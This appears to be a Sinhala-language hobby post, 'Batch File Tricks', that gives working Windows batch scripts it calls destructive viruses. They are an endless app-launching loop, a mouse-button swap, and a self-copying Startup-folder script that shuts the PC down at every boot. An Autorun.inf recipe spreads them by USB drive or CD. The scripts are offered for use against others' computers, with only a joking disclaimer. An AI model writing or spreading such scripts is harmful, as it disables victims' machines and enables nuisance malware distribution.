Batch File Tricks

26 4 0
                                    

අද මම ඔයාලට කියන්නේ Batch file පිලිබදව😱.

⚠ සැ.යු :- මේකේ තියෙන දේවල් කරලා කෙලවගත්තොත් අපි වග කියන්නේ නෑ.😂

🔴Batch file (".bat") කියන්නේ windows මෙහෙයුම් පද්ධති වල තියන

extension විශේශයක්.

මෙම Batch file වලින් කරන්නෙ අපි command prompt

එකෙන් කරන වැඩ එක වර සිදුකර ගැනීමක්.

Batch file මගින් අපිට පුළුවන් ඉතාමත් විනාශකාරී VIRUSES නිර්මාණය කරන්න.

තවත් දෙයක් අපට මෙම Batch file අපගේ පරිගණකයේ Notepad හරහා නිර්මාණය කරන්න පුළුවන්😉.

මෙම Batch file ක්‍රියාත්මක වෙනකොට command prompt එකත් open වෙනවා. ඒක මෙහි ඇති පොඩි

දුර්වල තාවයක්😅.

1-App Bomb

හරි දැන් පහළ තියන code එක notepad එකට copy කරලා

example.bat කියලා save කරගන්න.

ඉහත example කියන තැනට ඔයාට කැමති නමක් දෙන්න හැබැයි .bat කියන එක අනිවාර්යයි.

@echo off

:x

start cmd

start notepad

start calc

start control

start explorer

goto x

@echo off මගින් වෙන්නේ අපි ලියන code එක command prompt හරහා නොපෙන් වීම.

:x මෙය අපි යොදාගන්නා variable එකක්

start මෙයින් අපිට අපට අවශ්‍ය application එක open වෙනවා

goto x ඉහත :x variable එක යටතේ ඇති දේ නැවත ක්‍රියාත්මක වෙනවා

මෙය නැවැත් වීමට පරිගණකය Restart කළ යුතුයි.

2-Mouse Crazy

පහළ තියන code එක notepad එකට copy කරලා

example.bat කියලා save කරගන්න.

ඉහත example කියන තැනට ඔයාට කැමති නමක් දෙන්න හැබැයි .bat කියන එක අනිවාර්යයි.

@echo off

Rundll32 user32,SwapMouseButton

මේක ක්‍රියාත්මක කරාම Mouse එක පිස්සු නටනවා.මේක නවත් වන්න

start>Control Panel>Mouse ගිහිල්ලා ඒකෙ

Button Configuration වල තියෙන Switch

primary and secondary buttons එකේ

හරි සලකුන ඉවත් කරන්න.

3-Computer On & Off

හරි දැන් පහළ තියන code එක notepad එකට copy කරලා

example.bat කියලා save කරගන්න.

ඉහත example කියන තැනට ඔයාට කැමති නමක් දෙන්න හැබැයි .bat කියන එක අනිවාර්යයි.

copy example.bat "C:\Users\You\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

shutdown -s -t 00

මෙයින් සිදුවන්නේ පරිගණකය On වූ පසු නැවත ක්‍රියාවිරහිත වේ.

මෙය නැවැත් වීමට පරිගණකය safe mode හරහා On කර මෙම path එක හරහා ගොස් example.bat

file එක delete කර දමන්න.

("C:\Users\You\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")

🔴ඔයාලට මෙම වැඩසටහන් pen drive එකක් හරහා හෝ cd හරහා ක්‍රියාත්මක කල හැකිය.

ඒ සදහා හරි දැන් පහළ තියන code එක notepad එකට copy කරලා

Autorun.inf කියලා save කරගන්න.

[autorun]

open=example.bat

icon=example.ico

ඉහත example කියන තැනට ඔබගේ Batch file එකේ නම දෙන්න

දැන් ඔයාගෙ Batch file එකයි Autorun.inf එකයි pen එකට copy කරන්න.

cd එකටනම් burn කරන්න.

Techs And HackingWaar verhalen tot leven komen. Ontdek het nu